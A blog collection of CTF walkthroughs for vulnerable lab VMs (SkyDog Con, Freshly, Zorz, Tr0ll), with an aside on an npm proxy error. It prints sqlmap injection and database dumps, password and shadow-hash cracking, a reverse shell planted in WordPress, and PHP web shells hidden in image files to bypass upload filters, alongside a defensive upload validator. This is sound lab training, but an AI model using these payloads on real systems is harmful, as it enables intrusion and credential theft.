Walkthrough SkyDog Con CTF – The Legend Begins

Okay, I wish I could say that I really solved this but I didn’t get all the flags. But I am going to do a write up anyways, to not forget what I learned.

The CTF is called SkyDog Con CTF – The Legend Begins, and can be found here. Thanks James Bower for a fun CTF!

Instructions

The CTF is a virtual machine and works best in Virtual Box. This OVA was created using Virtual Box 4.3.32. Download the OVA file open up Virtual Box and then select File –> Import Appliance. Choose the OVA file from where you downloaded it. After importing the OVA file above it is best to disable the USB 2.0 setting before booting up the VM. The networking is setup for a NAT Network but you can change this before booting up depending on your networking setup. If you have any questions please send me a message on Twitter @jamesbower and I’ll be happy to help.

Goal of Sky Dog Con CTF

The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself.

Flags

The six flags are in the form of flag{MD5 Hash} such as flag{1a79a4d60de6718e8e5b326e338ae533}

Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
Flag #2 When do Androids Learn to Walk?
Flag #3 Who Can You Trust?
Flag #4 Who Doesn’t Love a Good Cocktail Party?
Flag #5 Another Day at the Office
Flag #6 Little Black Box

First flag

Let’s search the network and scan the machine.

$ nmap -v 192.168.1.1/24

Nmap scan report for 192.168.1.108
Host is up (0.0053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

$ nmap -A -T4 -v -p- 192.168.1.108

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 c8:f7:5b:33:8a:5a:0c:03:bb:6b:af:2d:a9:70:d3:01 (DSA)
|   2048 01:9f:dd:98:ba:be:de:22:4a:48:4b:be:8d:1a:47:f4 (RSA)
|_  256 f8:a9:65:a5:7c:50:1d:fd:71:57:92:38:8b:ee:8c:0a (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 252 disallowed entries (15 shown)
| /search /sdch /groups /catalogs /catalogues /news /nwshp
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl
|_/addurl/image? /mail/ /pagead/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Okay, so we have SSH and port 80. Nmap also revealed that there’s a lot going on in robots.txt.

But first I want to check out port 80.
On the first page there is an image. I remember the name of the first flag: “Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)”. Okay, so I download the image and check it out in exiftool.

wget http://skydog.dev/SkyDogCon_CTF.jpg

exiftool SkyDogCon_CTF.jpg

And BAM first flag. Found in the comment.

XP Comment                      : flag{abc40a2d4e023b42bd1ff04891549ae2}

This is when I started getting cocky. If it is this easy, it’s gonna be a breeze. Shame on me.

Now I check out the robots.txt file. And BOOM another flag.

# Congrats Mr. Bishop, your getting good - flag{cd4f10fcba234f0e8b2f60a490c306e6}

So in the robots file there was a lot of entries.

Many of them looked like this:

For example stuff like this
Allow: /?hl=*&gws_rd=ssl$
Disallow: /?hl=*&*&gws_rd=ssl
Allow: /?gws_rd=ssl$
Allow: /?pt1=true$

I was sure that this was meant for some SQL injections. So I fired up sqlmap, but nothing.

So I figured that I would see which of all the pages worked, because most of them 404ed. So in order to do that in an efficient way (and inefficient, since nikto already told me which pages responded with 200) I figured that it would be fun to do it with bash.

There are probably a million ways to write this code in a better way. But it worked for me.

First I used cut to cut out all the urls and store them in a file I called robbo.

cut -d/ -f2-5 robots.txt > robbo

Then I wrote and ran this little script, which outputs the headers of the requests into the file output.

#!/bin/bash
# Reads one path per line from robbo, and appends the URL followed by the
# HEAD response headers to the file output.
while read -r p; do
  echo "http://skydog.dev/$p" >> output
  curl --head "http://skydog.dev/$p" >> output
done < robbo

Then I ran grep on that file to show me all the 200s.

grep 200 -A 3 -B 3 output

So yeah, not very efficient. But it led me to this url: http://skydog.dev/Setec/
But that was not really thanks to my crappy script. I had found it when I used the spider in ZAP as well. Anyways, that page led me to this: http://skydog.dev/Setec/Astronomy/ where I found the zipfile Whistler.zip.
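The cut/curl/grep round trip above can be collapsed into one script. This is an added example, not code from the write-up: it parses the Allow/Disallow entries, strips the robots wildcards and end anchors that are not part of a URL, dedupes the paths and HEAD-checks each one. The sample robots.txt is constructed to resemble the entries seen above, and http://skydog.dev is the lab hostname from the write-up.

```python
"""Extract candidate paths from a robots.txt and check which ones exist."""
import re
import urllib.request
from urllib.error import HTTPError, URLError

# Constructed sample modelled on the Google-style entries in the SkyDog
# robots.txt; the comment line stands in for where the flag was found.
SAMPLE_ROBOTS = """\
# Congrats Mr. Bishop, your getting good - flag{PLACEHOLDER}
User-agent: *
Disallow: /search
Allow: /search/about
Disallow: /sdch
Disallow: /groups
Allow: /?hl=*&gws_rd=ssl$
Disallow: /?hl=*&*&gws_rd=ssl
Allow: /?gws_rd=ssl$
Disallow: /setnewsprefs?
Disallow: /Setec/
Disallow: /search
"""

RULE_RE = re.compile(r"^\s*(allow|disallow)\s*:\s*(\S*)", re.IGNORECASE)


def extract_paths(robots_text):
    """Return unique candidate paths in file order.

    '*' and '$' are robots pattern syntax, not URL text, so they are removed;
    an entry with a query string is kept because the server may route on it.
    Comment lines and a bare '/' are dropped.
    """
    seen = []
    for line in robots_text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        path = m.group(2).rstrip("$").replace("*", "")
        # removing wildcards can leave '&&' or '?&' behind; tidy them up
        path = re.sub(r"&+", "&", path).replace("?&", "?")
        if path in ("", "/") or path in seen:
            continue
        seen.append(path)
    return seen


def check_paths(base_url, paths, timeout=5):
    """HEAD each path and return {path: status or error text}. Needs network."""
    results = {}
    for p in paths:
        req = urllib.request.Request(base_url.rstrip("/") + p, method="HEAD")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                results[p] = resp.status
        except HTTPError as e:
            results[p] = e.code
        except URLError as e:
            results[p] = str(e.reason)
    return results


def interesting(results):
    """Keep what is worth a look: 2xx/3xx, plus 403 (exists but access denied)."""
    return {p: s for p, s in results.items()
            if isinstance(s, int) and (200 <= s < 400 or s == 403)}


if __name__ == "__main__":
    paths = extract_paths(SAMPLE_ROBOTS)
    print(paths)
    # Live run against the lab host from the write-up:
    # print(interesting(check_paths("http://skydog.dev", paths)))
```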

I downloaded it and tried to open it. But it required a password. So I started googling and found fcrackzip. And I started playing around with it. But in the end I ran the wrong command.

$ fcrackzip -D -p rockyou.txt Whistler.zip

possible pw found: yourmother ()
possible pw found: jinglebells ()
possible pw found: 200595 ()
possible pw found: spellman ()
possible pw found: jenny86 ()
possible pw found: julie10 ()
possible pw found: nascar7 ()
possible pw found: millie25 ()
possible pw found: hackett1 ()
possible pw found: chrebet ()

It just returned tens of possible passwords.

I should have run it like this:

fcrackzip -D -v -u -p rockyou.txt Whistler.zip

found file 'flag.txt', (size cp/uc     50/    38, flags 9, chk 874a)
found file 'QuesttoFindCosmo.txt', (size cp/uc     72/    61, flags 9, chk 83b5)


PASSWORD FOUND!!!!: pw == yourmother

Yeah, I was stuck here and thought that there was something wrong with the program or something. So I cheated a bit and learned the correct way to use fcrackzip.

I got the flag: flag{1871a3c1da602bf471d3d76cc60cdb9b} and a clue for the next flag:
“Time to break out those binoculars and start doing some OSINT”

So I started googling about OSINT.
OSINT stands for Open Source Intelligence. Something I didn’t know of before reading about it. After reading about it on Wikipedia I gather that it doesn’t concern what programmers know of open source. It means more like public. Like public information gathering. It comes from the intelligence community.

Here I got really stuck again. And so I cheated. Again. Sorry.
I read in another walkthrough that he had taken the words from the movie Sneakers on IMDb and run them through DirBuster.

So I did that as well.

I took the movie script and downloaded it. Then I wrote the following bash-script:

#!/bin/bash
# Splits sound.txt (the script text) on whitespace and writes one word per
# line, producing a wordlist for ZAP's forced browse.
set -f   # don't let a word such as * expand to filenames
for word in $(<sound.txt)
do
    echo "$word" >> sneakersWord2.txt
done

It takes sound.txt as input and writes each word on its own line in sneakersWord2.txt, which I then used in ZAP.

So I found the path:

/PlayTronics/

In /PlayTronics I got the flag:
http://skydog.dev/PlayTronics/flag.txt
And the next clue. http://skydog.dev/PlayTronics/companytraffic.pcap
A packet capture of network traffic. So I ran:

tcpick -C -yP -r companytraffic.pcap > companytraffic.txt

And started poking around in it with grep. But yeah. I didn’t really get anywhere with it. This is where I just gave up.

If you want to find the rest of the flags check out g0blin’s great write-up if you haven’t already.

Conclusion

I really made a lot of mistakes on this one, and some stuff was just over my head. Like somehow remaking the sound-clip from the pcap-file. That would have been cool to do.
I would have easily gotten the zip-file if I just had learned the tool a bit better.
I should also have read the instructions better! If I had done that I would have figured out that I of course should have tried to crack the MD5 hashes.

I got to play around with some more Unix commands like cut, and writing a bit in bash which is always useful. I also got to try out fcrackzip, although I doubt it will ever be useful. It seems like a really old technology.

So all in all a fun CTF and I learned some more. Which in the end is the most important thing.

Walkthrough Freshly

I did another vulnerable VM. This one is called Freshly and can be found here. It is also made by tophatsec, so thanks tophatsec for another great VM. Let’s get started.

First let’s find the machine.

nmap 192.168.1.1/24

Great, now that we got the ip, let’s scan it.

nmap -A -T4 -p- 192.168.1.107

Starting Nmap 7.00 ( https://nmap.org ) at 2016-04-24 12:18 CLST
Nmap scan report for 192.168.1.107
Host is up (0.00058s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp  open  ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05
|_Not valid after:  2025-02-14T03:30:05
8080/tcp open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.45 seconds

Okay, so we have a port 80, and SSL-port 443, and port 8080. All web.
On port 80 there is just a Star Wars gif. I download it and check it out in exiftool just in case. But nothing of interest.

I fire up ZAP and start doing a Force Browse (DirBusting).
Meanwhile I check out port 8080 and port 443. Both of them seem to lead to a WordPress installation. I snoop around and find that there is a user named admin (the default user in WordPress). I try to log in with admin/admin in /wp-admin but no result. I also try a dictionary attack but without any luck. But I am not locked out, so that means there are no plugins with fail2ban-style features.

I try some SQL injections in the store but without success.

So I go back to ZAP to see what it has found. And I can see that it has found a page called /login.php and phpmyadmin. So I head over to login.php and find a login. I use sqlmap to see if there are any vulnerabilities.

So I make a request, intercept it in Burp Suite, and copy-paste the request to a file I call request.txt. “user” is the parameter that I am testing for injections.

./sqlmap.py -r request.txt -p user

Okay, so sqlmap found a time-based blind.

---
Parameter: user (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: user=' AND (SELECT * FROM (SELECT(SLEEP(5)))RRpU) AND 'wUfW'='wUfW&password=&s=Submit
---

I had never successfully used sqlmap before, so this was a great learning experience. So after finding out that there is a vulnerability I run the following command to get the databases. It really took a long time because it was a time-based attack.

./sqlmap.py -r request.txt -p user --dbs

Output:

available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080

Then I wanted the tables and the content, so I ran:

./sqlmap.py -r request.txt -p user --tables -D wordpress8080

Database: wordpress8080
[1 table]
+-------+
| users |
+-------+
./sqlmap.py -r request.txt -p user --dump -D wordpress8080 -T users
Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password            |
+----------+---------------------+
| admin    | SuperSecretPassword |
+----------+---------------------+

So yeah, not so secret password. I used it to login to wordpress.
This guide was quite useful to get the hang of sqlmap.

So, admin on a CMS usually means shell. So I went to appearance/editor and then I just copy-pasted my reverse shell into header.php. Probably not the most silent way, but it is easy to remove the code after it has been executed.
Then I fired up netcat. With:

nc -v -l 1234

-v stands for verbose. -l for listening. And 1234 is the port. The -p flag is not really needed to define the port.

Make sure that your firewall is open.

sudo ufw allow 1234

So, now I got a shell with the user daemon

uid=1(daemon) gid=1(daemon) groups=1(daemon)

I create a file in /tmp called linEnum.sh where I copy-paste the LinEnum file. Then:

chmod +x linEnum.sh
./linEnum.sh

To enumerate important and interesting files. It outputs a lot of stuff, among others this:
/etc/passwd

user:x:1000:1000
mysql:x:103:111
candycane:x:1001:1001
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

And the following in /etc/shadow

root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::

There is also a message in the shadow-file:
# YOU STOLE MY PASSWORD FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

I thought I had to reach root, so I didn’t really think of this as the flag. So I copied the hashes and started running hashcat on them, which was fun as it was the first time. So I ran it on all three hashes, with the following command.

./hashcat-cli64.bin -m 1800 -a 0 -o found.txt --remove candycane.hash ~/sectools/SecLists/Passwords/10_million_password_list_top_100000.txt

I only found the password for candycane which was “password”. I didn’t manage to crack the other users.

Now I wanted to su up for candycane but it didn’t work since I didn’t have a tty-shell. And

import pty; pty.spawn('/bin/bash')

this didn’t work. But I found a workaround.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/shell.py
python /tmp/shell.py

So this gave me a tty-shell and I could run su candycane.

So, here I got stuck a while and started looking back in my notes to see if I had missed something. So I took out the content from the database login

Database: login
Table: users
[2 entries]
+----------+-----------+
| password | user_name |
+----------+-----------+
| password | candyshop |
| PopRocks | Sir       |
+----------+-----------+

And I tried these passwords on user and root. But it didn’t work. After many other tries enumerating the system I gave up. And on some other walkthroughs I found that the password for user (which was a sudo-user) and root was SuperSecretPassword. So that was a little bit annoying that I never tried that. And I also found out that it was the same password for the mysql-root user. Which could be found in the login.php-file. So that was a little bit stupid that I never checked that.

Conclusion

All in all it was a great VM. I got to learn tools like hashcat and sqlmap, which I am sure will come in handy on other VMs. I also learned about wpscan while reading other walkthroughs. I was surprised that SuperSecretPassword was not found in my password-dictionaries that I tried.

Other things that I missed were playing around with phpmyadmin. I read in some other walkthroughs that you could figure out the DBMS from it. That would have been good.

But at least I got the flags.

Walkthrough Zorz

I have been playing around with another vulnerable VM, this one is called Zorz, and can be found here on vulnhub. It is made by Top-hat-sec.

First I imported the VM, but it automatically used eth0, instead of wlan. So once that was changed I could find the machine when I did my scan.

nmap -v 192.168.1.1/24

I have started running nmap in verbose mode, because it can be fun to see how nmap is working, and especially if it is really slow, and I start to doubt that everything is really working as it should.

sudo nmap -A -T4 -p- 192.168.1.104

So this stands for -A: Aggressive, and it includes: OS detection, version detection, script scanning, and traceroute.

-T4 is how fast the scanning should be. -T4 is “aggressive”, but not -T5 “insane”. So it works out fast, but still reliable. Although it doesn’t really matter. I think it is more useful when you need to scan hundreds of networks. In how much of a hurry you are. Granted T0 is slooow. -T3 is the default.

Starting Nmap 7.00 ( https://nmap.org ) at 2016-04-23 21:23 CLST
Nmap scan report for zorz.dev (192.168.1.104)
Host is up (0.0011s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 48:bb:d8:38:b8:25:a6:6c:5e:7f:67:c9:ec:53:cc:ed (DSA)
|   2048 ec:55:48:93:28:90:f6:bf:3c:cd:e3:90:42:26:3b:5d (RSA)
|_  256 3f:0a:11:c9:59:73:be:df:f7:77:59:65:07:91:d7:d6 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:9A:0D:2F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.08 ms zorz.dev (192.168.1.104)

Okay, so we just have ssh and 80. Let’s start ZAP and dir-browsing, because that can take some time. And let that roll while we check out the browser.

Challenge 1

So we find three challenges. Three ways to upload images to the server. So I guess that we want to bypass the image-restrictions and upload shells instead.

The first one was really straightforward. It didn’t really do any check. So I could just upload php-reverse-shell.php without any problems. But where was the file? I continued to play with Challenge 2 and 3. On the third one it says where the file was uploaded. It was uploaded into a dir called uploads3. So I figured the files for challenge 1 and 2 were to be found in uploads1 and uploads2.

So I opened port 1234 in the firewall with the command:

ufw allow 1234

And then I used netcat to start listening in on that port, and get ready for the shell.

nc -v -l 1234

So -v stands for verbose. -l for listen. So that netcat knows that it should listen for an incoming connection, and not establish a connection itself. 1234 is the port that it should listen on.
Now we just click on the shell-file in uploads1 and the server connects to netcat.

So yeah, this was pretty easy. Basically no check whatsoever.

Challenge 2

Now it is getting a bit more difficult. We cannot upload a file that does not end with .png, .jpg, .gif.

But instead we can just rename our shell and upload it as shell.php.jpg. It passed the filter and the file is executed as php.

Challenge 3

This challenge was a bit harder. Because somehow it was checking to see if the file itself was an image. I found two ways to bypass this check.
From this great tutorial I learned how to get around it. Basically you just add the text “GIF89a;” before your shell code. So it would look something like this:

GIF89a;
<?php
system($_GET['cmd']); // or paste a complete shell here instead
?>

So that worked and I managed to get a shell up and running.

The second way to beat this challenge is to add the shell-code into a comment of a image-file.

First I looked for a simple jpg file online “jpg file:jpg”. And then I inserted the php-code into the image comment with the following command.

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' lo.jpg

Exiftool is a great tool to view and manipulate exif-data.
Then I had to rename the file

mv lo.jpg lo.php.jpg

Then upload it. When I then click on it the browser just outputs gibberish.

http://zorz.dev/uploads1/lo.php.jpg?cmd=ls

So when we run this in the browser it outputs the result on the webpage. So yeah, we have a shell.

Then we can move to
http://zorz.dev/uploads1/lo.php.jpg?cmd=cat%20/var/www/html/l337saucel337/SECRETFILE
And see the win-file.

There are many more tricks to bypass fileupload restrictions. Here are some:
https://pentestlab.wordpress.com/2012/11/29/bypassing-file-upload-restrictions/
http://www.securityidiots.com/Web-Pentest/hacking-website-by-shell-uploading.html
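Seen from the defending side, the three challenges map onto three validation mistakes: no check at all, accepting any name that contains an allowed extension somewhere, and accepting any body that starts with image magic bytes. The following is an added example, not code from the VM or from the tutorials linked above: a Python validator that requires exactly one extension, checks that the body parses as that image type (a bare “GIF89a;” prefix fails the structure check), strips JPEG comment and APP segments so an exiftool -Comment payload does not reach disk, and stores the file under a random name so the client’s filename is never reused. The sample GIF and JPEG are constructed inline; the structure checks are heuristics, the random name plus a non-executing upload directory is the control that actually matters.

```python
import re
import secrets
import struct

# Allowed types and the magic prefix each must start with.
MAGIC = {"gif": b"GIF8", "jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n"}
# Exactly one dot: "shell.php.jpg" never matches.
NAME_RE = re.compile(r"^[A-Za-z0-9_-]+\.([A-Za-z0-9]+)$")


class UploadRejected(ValueError):
    pass


def _jpeg_segments(data):
    """Yield (marker, raw_segment) up to and including SOS, then
    (None, remainder) for the entropy-coded data that follows SOS."""
    if data[:2] != b"\xff\xd8":
        raise UploadRejected("not a JPEG")
    i = 2
    while i + 4 <= len(data):
        if data[i] != 0xFF:
            raise UploadRejected("corrupt JPEG marker")
        marker = data[i + 1]
        seg_len = struct.unpack(">H", data[i + 2:i + 4])[0]
        yield marker, data[i:i + 2 + seg_len]
        i += 2 + seg_len
        if marker == 0xDA:  # start of scan: no more header segments
            yield None, data[i:]
            return
    raise UploadRejected("truncated JPEG")


def _gif_ok(data):
    # Header, 7-byte logical screen descriptor, optional global colour table,
    # then a block introducer (0x2C image, 0x21 extension, 0x3B trailer).
    # "GIF89a;<?php ..." has none of this structure and fails here.
    if len(data) < 14 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return False
    w, h, packed = struct.unpack("<HHB", data[6:11])
    i = 13 + (3 * (2 << (packed & 0x07)) if packed & 0x80 else 0)
    if i >= len(data) or data[i] not in (0x2C, 0x21, 0x3B):
        return False
    return bool(w and h) and data[-1] == 0x3B


def _png_ok(data):
    if len(data) < 33 or data[12:16] != b"IHDR":
        return False
    if data[-12:-4] != b"\x00\x00\x00\x00IEND":
        return False
    w, h = struct.unpack(">II", data[16:24])
    return bool(w and h)


def _jpeg_ok(data):
    try:
        for marker, seg in _jpeg_segments(data):
            if marker in (0xC0, 0xC1, 0xC2):  # SOF: baseline/extended/progressive
                h, w = struct.unpack(">HH", seg[5:9])
                return bool(w and h)
    except (UploadRejected, struct.error):
        pass
    return False


def strip_jpeg_metadata(data):
    """Drop COM (0xFE) and APP1..APP15 (EXIF, XMP, ...) segments, keep APP0/JFIF."""
    out = bytearray(b"\xff\xd8")
    for marker, seg in _jpeg_segments(data):
        if marker is not None and (marker == 0xFE or 0xE1 <= marker <= 0xEF):
            continue
        out += seg
    return bytes(out)


def validate_upload(filename, data):
    """Return (storage_name, bytes_to_write) or raise UploadRejected."""
    m = NAME_RE.match(filename)
    if not m:
        raise UploadRejected("filename must be name.ext with a single extension")
    ext = {"jpeg": "jpg"}.get(m.group(1).lower(), m.group(1).lower())
    if ext not in MAGIC:
        raise UploadRejected("extension not allowed")
    if not data.startswith(MAGIC[ext]):
        raise UploadRejected("body does not match the declared type")
    if not {"gif": _gif_ok, "png": _png_ok, "jpg": _jpeg_ok}[ext](data):
        raise UploadRejected("not a well-formed image")
    if ext == "jpg":
        data = strip_jpeg_metadata(data)
    # Decisive control: never reuse the client's name, one whitelisted extension,
    # and the upload directory must be configured not to execute scripts.
    return secrets.token_hex(16) + "." + ext, data


def is_rejected(filename, data):
    try:
        validate_upload(filename, data)
    except UploadRejected:
        return True
    return False


def _seg(marker, payload):
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


# Constructed samples: a 1x1 GIF, and a 1x1 JPEG carrying a PHP comment segment.
SAMPLE_GIF = (b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)
              + b"\x00\x00\x00\xff\xff\xff"                     # 2-entry colour table
              + b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0)  # image descriptor
              + b"\x02\x02\x44\x01\x00\x3b")                    # LZW data + trailer
SAMPLE_JPEG = (b"\xff\xd8" + _seg(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
               + _seg(0xFE, b"<?php echo '<pre>'; system($_GET['cmd']); ?>")
               + _seg(0xC0, b"\x08\x00\x01\x00\x01\x01\x01\x11\x00")  # SOF0, 8-bit 1x1
               + _seg(0xDA, b"\x01\x01\x00\x00\x3f\x00") + b"\x00\xff\xd9")
PHP_WITH_GIF_PREFIX = b"GIF89a;\n<?php\nsystem($_GET['cmd']);\n?>"
```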

NPM “network tunneling socket”-error

Sometimes when I have tried to download npm-packages I have received the following error:

npm ERR! node v4.3.1
npm ERR! npm  v2.14.12
npm ERR! code ECONNRESET

npm ERR! network tunneling socket could not be established, cause=connect ECONNREFUSED 127.0.0.1:8080
npm ERR! network This is most likely not a problem with npm itself
npm ERR! network and is related to network connectivity.
npm ERR! network In most cases you are behind a proxy or have bad network settings.
npm ERR! network 
npm ERR! network If you are behind a proxy, please make sure that the
npm ERR! network 'proxy' config is set properly.  See: 'npm help config'

npm ERR! Please include the following file with any support request:

Which is strange since I am not behind a proxy. I am not quite sure what the real issue here is. But I have found that a solution for it is:

npm config set proxy false
npm cache clean

This seems to do the trick for me.

Walkthrough Tr0ll VM

This is a walkthrough of the VM Tr0ll. That can be found on vulnhub.

Let’s fire up Virtualbox and boot up the VM.

Mapping

Let’s start by scanning the network to find our server.

nmap 192.168.1.0/24
Nmap scan report for 192.168.1.107
Host is up (0.0067s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

I usually map the machine to a fake-domain address so that Burp Suite will work.

sudo vim /etc/hosts
192.168.1.107   troll.dev

Okay, so we have three ports showing, after an initial scan. Let’s try all the ports. To make sure we are not missing anything.
The A-flag stands for aggressive. This flag is a combination of -O (OS-detection), -sV (version scanning), -sC (script scanning), and --traceroute.
-p- means that we will check all 65532 ports.

nmap -A -p- 192.168.1.107

#Output
Starting Nmap 7.00 ( https://nmap.org ) at 2016-04-11 21:02 CLST
Nmap scan report for troll.dev (192.168.1.107)
Host is up (0.0070s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

FTP

Okay, so we can see that the server is using vsftpd version 3.0.2. Vsftpd is the default ftp-server in many Linux systems. This configuration appears to allow anonymous logins, which is why we are able to retrieve the file listing of the root directory just by scanning it. So we can see that there is a file called lol.pcap. We will get to this later.

SSH

We can also see that port 22 is open, the standard port for SSH. The version seems to be 6.6.1p1, which is not the latest. Then we can see the host-key of ssh.

HTTP

Okay so it seems port 80 is open. And it runs Apache 2.4.7, on Ubuntu.
It has a robots.txt file, which might be worth checking out.

Okay, so we have two interesting leads here. We have the file lol.pcap on the ftp-server, and we have port 80. So let’s check out the web.
The index-page just gives us a troll-image. I download it and investigate the meta-data of the image. But I find nothing interesting.

wget http://troll.dev/hacker.jpg
exiftool hacker.jpg

Let’s check out the robots file.

User-agent:*
Disallow: /secret

It leads us to secret. But that is just another troll image, and with no interesting meta-data.

lol.pcap

We log in with the user anonymous and don’t need to provide a password.

ftp 192.168.1.107
Connected to 192.168.1.107.
220 (vsFTPd 3.0.2)
Name (192.168.1.107:comp): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (92693.0 kB/s)

Okay. So now we have the .pcap file on the computer. But what is a pcap file?
Pcap stands for “Packet Capture”. Which means that it is a file filled with packets that have been captured and saved in the file. So we are able to analyze network packets after they have been sent. So in order to make any sense of this file we need a program to open it with. Wireshark is popular to use. But I don’t have it on this computer, so instead I use tcpick. Tcpick is, just like Wireshark, a TCP stream sniffer.

We run the following command. -C stands for colour output, -yP for viewing the packets as printable characters, and -r to read from a file.

tcpick -C -yP -r lol.pcap

Here is the output:

tcpick: reading from lol.pcap
1      SYN-SENT       10.0.0.12:52449 > 10.0.0.6:ftp
1      SYN-RECEIVED   10.0.0.12:52449 > 10.0.0.6:ftp
1      ESTABLISHED    10.0.0.12:52449 > 10.0.0.6:ftp
220 (vsFTPd 3.0.2)
USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful. Consider using PASV.
LIST
2      SYN-SENT       10.0.0.6:ftp-data > 10.0.0.12:44486
2      SYN-RECEIVED   10.0.0.6:ftp-data > 10.0.0.12:44486
2      ESTABLISHED    10.0.0.6:ftp-data > 10.0.0.12:44486
150 Here comes the directory listing.
-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt
2      FIN-WAIT-1     10.0.0.6:ftp-data > 10.0.0.12:44486
2      FIN-WAIT-2     10.0.0.6:ftp-data > 10.0.0.12:44486
2      TIME-WAIT      10.0.0.6:ftp-data > 10.0.0.12:44486
2      CLOSED         10.0.0.6:ftp-data > 10.0.0.12:44486
226 Directory send OK.
TYPE I
200 Switching to Binary mode.
PORT 10,0,0,12,202,172
200 PORT command successful. Consider using PASV.
RETR secret_stuff.txt
3      SYN-SENT       10.0.0.6:ftp-data > 10.0.0.12:51884
3      SYN-RECEIVED   10.0.0.6:ftp-data > 10.0.0.12:51884
3      ESTABLISHED    10.0.0.6:ftp-data > 10.0.0.12:51884
